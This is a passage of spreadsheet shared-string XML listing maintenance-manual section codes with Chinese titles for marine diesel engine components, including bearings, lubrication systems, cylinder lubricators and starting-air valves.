        <charset val="134"/>
      </rPr>
      <t>轴接地装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2555-0140 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承检查报告</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2555-0145 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承实际尺寸检测</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>2555-0150TIAlu</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴瓦接受标准</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2555-0155 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>损坏瓦检查</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2555-0160 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承检查</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>2555-0165 Ex</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检查记录</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>2555-0170 Bl</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检查记录</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2555-0175 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴偏差</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2555-0180 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴偏差限制</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2555-0185 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检查方法</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2565-0100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2565-0101 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2565-0200 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2565-0201 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2565-0300 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲柄销轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2565-0301 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲柄销轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2565-0400 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2565-0401 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2565-0500 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>颈轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2565-0501 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>颈轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2565-0600 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2565-0601 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2570-0010 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承工具面板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2570-0021 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>制动块</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减震器，液压工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2570-0101 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴承工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2570-0400 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承液压工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2570-0411 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2570-0420 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承轴瓦工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2570-0430 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承测量</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2572-0101 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴上链轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2572-0110 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2572-0200 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2572-0300 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2572-0400 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2572-0600 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力轴承，推力块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">2572-0650 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力轴承，其它</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>25db</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>消音器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>26</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>耳垫片</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>级油缸活塞</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轮台车</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>位</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>3</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通导阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>位</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>3</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通电磁阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>位</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>3</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>位</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>3</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通手动阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>位</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>4</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通电磁阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>位</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>4</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>位</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>5</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通电磁阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>位</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>5</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通手动阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">3040-0100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油系统</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">3045-0110 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸润滑</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">3045-0120 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油循环系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">3045-0130 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>循环系统维护</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">3045-0140 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器润滑</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">3045-0150 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>独立凸轮轴滑油系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">3045-0160 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>整体润滑主机凸轮轴润滑</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">3055-0110 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸润滑油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">3055-0115 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>循环油系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">3055-0120 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>循环油系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">3055-0125 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内部循环油系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">3055-0130 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主润滑系统串油</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">3055-0135 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填料函清洁系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">3055-0140 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴滑油系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">3055-0145 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴滑油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">3055-0150 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴滑油系统串油</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">3055-0155 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器滑油系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">3065-0600 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸注油器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">3065-0601 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸注油器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">3066-0150 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>润滑油</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">3066-0151 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>润滑油</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">3070-0601 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸注油器测试工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">3072-0600 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸注油器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">3072-0700 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链传动润滑</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>30</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">3440-0100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压缩空气系统</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">3455-0100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动空气系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>3455-0101 MC-S</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动空气系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">3465-0200 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动空气阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">3465-0201 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动空气阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">3465-0500 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动空气分配器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">3465-0501 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动空气分配器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">3470-0101 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动空气系统板上工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">3470-0111 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动空气系统工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">3472-0140 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减压站</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
